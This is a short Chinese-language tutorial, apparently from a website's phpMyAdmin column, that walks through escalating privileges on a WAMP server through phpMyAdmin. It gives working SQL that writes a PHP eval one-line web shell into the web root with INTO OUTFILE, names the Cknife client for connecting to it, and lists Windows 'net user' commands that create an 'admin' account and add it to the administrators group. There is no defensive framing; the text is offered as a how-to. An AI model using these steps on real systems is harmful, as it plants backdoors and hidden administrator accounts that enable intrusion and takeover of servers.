怎么利用phpMyAdmin提权

下面由phpmyadmin教程栏目给大家介绍利用phpMyAdmin提权的方法,希望对需要的朋友有所帮助!

利用phpMyAdmin提权

爆路径

得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php

写马

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");
select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";
Drop TABLE IF EXISTS a;

获得webshell

最后用Cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add

以上就是怎么利用phpMyAdmin提权的详细内容,更多请关注其它相关文章!